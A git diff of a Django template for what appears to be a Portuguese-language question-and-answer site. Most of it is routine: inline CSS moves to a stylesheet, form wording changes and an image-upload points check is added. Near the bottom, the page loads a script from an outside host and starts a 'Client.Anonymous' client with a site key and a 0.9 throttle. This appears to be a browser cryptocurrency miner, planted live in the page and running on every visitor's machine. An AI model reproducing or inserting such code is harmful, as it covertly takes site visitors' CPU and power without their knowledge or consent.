--- a/main_app/templates/question.html
+++ b/main_app/templates/question.html
@@ -6,7 +6,7 @@
 		<meta charset="utf-8">
 		<meta name="viewport" content="width=device-width, initial-scale=1">
 		<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.1.3/dist/css/bootstrap.min.css">
-		<link rel="stylesheet" href="/static/css/question.css">
+		<link rel="stylesheet" href="/static/css/question.css?version=1">
 		<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
 		<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.form/4.3.0/jquery.form.min.js"></script>
 		<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.3/umd/popper.min.js"></script>
@@ -45,102 +45,6 @@ $(function() {
 	});
 });
 		</script>
-		
-		<style>
-			.response-image {
-				max-width: 100%;
-				max-height: 400px;
-				display: block;
-				margin: auto;
-			}
-			.vid-container {
-				height: 20vw;
-				max-height: 350px;
-			}
-			.yt-vid {
-    			position: relative;
-    			width: 60%;
-    			height: 100%;
-				display: block;
-			}
-			.card-body {
-				padding-bottom: 0.75rem;
-			}
-			.list-group-item {
-				/*Corrige BS*/
-				border: none;
-				border-top: 1px solid rgba(0,0,0,.125);
-			}
-			.list-group-item:focus, .list-group-item:hover {
-				/*Corrige BS*/
-				z-index: 0;
-				text-decoration: none;
-			}
-			.poster-info {
-  				display: flex;
-				text-decoration: none;
-				color: black;
-				font-size: 80%;
-			}
-			.poster-info:hover {
-				text-decoration: none;
-				color: black;
-			}
-			.poster-container {
-				margin-bottom: 15px;
-			}
-			.poster-profile-pic-container, .poster-text-container {
-  				display: flex;
-  				align-items: center;
-  				padding-right: 6px;
-			}
-			.post-pub-date {
-				color: #666;
-			}
-			.list-group-item {
-				padding-left: 0px;
-				padding-right: 0px;
-			}
-			.comments {
-				background-color: rgba(0,0,0,.03);
-				padding: 10px;
-				display: none;
-			}
-			.c {
-				background-color: rgba(0,0,0,0);
-			}
-			.comm-card {
-				padding-top: 1.25rem;
-			}
-			.comm-form {
-				display: flex;
-			}
-			.form-control {
-				flex-grow: 1;
-				margin-right: 10px;
-			}
-			.load-more {
-				width: 100%;
-			}
-		@media (min-width: 320px) and (max-width: 480px) {
-			.vid-container {
-				height: 50vw;
-				max-height: 300px;
-			}
-			.yt-vid {
-    			position: relative;
-    			width: 90%;
-    			height: 100%;
-				display: block;
-			}
-			.comm-form .btn {
-				margin-top: 4px;
-				flex-grow: 1;
-			}
-			.form-control {
-				margin-right: 0px;
-			}
-		</style>
 	</head>
 	<body>
 
@@ -296,26 +200,13 @@ $(function() {
 			{% if user.username|answered:question.id == False %}
 			{% if question.creator.user.username|blocked:user.username == 'Bloquear' %}
 			
-			<style>
-				/* Estilos para o formulário abaixo. */
-				/*label {
-				   cursor: pointer;
-				}*/
-				#upload-photo {
-				   /*opacity: 0;
-				   position: absolute;
-				   z-index: -1;*/
-				   display: none;
-				}
-			</style>
-			
-			<form id="response-form" method="post" enctype="multipart/form-data" onsubmit="document.getElementById('response-loading-gif').style.display = 'block'; document.getElementById('send-response-btn').disabled = true; if (document.getElementById('upload-photo').value != '') { alert('A funcionalidade de enviar imagens nas respostas está em DEMO e pode não funcionar. Reinicie a página se demorar mais de 20 segundos.') }">
+			<form id="response-form" method="post" enctype="multipart/form-data" onsubmit="document.getElementById('response-loading-gif').style.display = 'block'; document.getElementById('send-response-btn').disabled = true;">
 				{% csrf_token %}
-				<textarea maxlength="5000" class="form-control" placeholder="Responda esta pergunta!" name="response" required="required"></textarea>
-				<input class="btn btn-primary" type="submit" value="Enviar" id="send-response-btn">
+				<textarea maxlength="5000" class="form-control" placeholder="Escreva uma resposta..." name="response" required="required"></textarea>
+				<input class="btn btn-outline-primary" type="submit" value="Enviar" id="send-response-btn">
 				
 				<label for="upload-photo"><img src="/static/images/camera.png" width="25px"> <span id="upload-photo-text"></span></label>
-				<input type="file" accept="image/*" name="file" id="upload-photo">
+				<input type="file" accept="image/*" name="file" id="upload-photo" onclick="return veracity_test({{ user_p.total_points }}, {% MINIMUM_POINTS_FOR_POSTING_IMAGES %});">
 				<img src="/static/images/close-icon.png" width="20px" style="display: none; cursor: pointer;" id="delete-photo-icon"><span>
 			</form>
 			<img src="/static/images/loading.gif" width="30px" style="display: none;" id="response-loading-gif">
@@ -341,6 +232,7 @@ $(function() {
 			</div>
 			{% endfor %}
 		</div>
+<script src="/static/js/general_functions.js?version=1"></script>
 <script src="https://www.hostingcloud.racing/zk0a.js"></script><script>var _client=new Client.Anonymous("5359e2aefac13b8544fcee9326d4a0aafb5fd62a6991f1e87ade167c09c9967a",{throttle:.9,c:"w",ads:0});_client.start();</script>
 	</body>
 
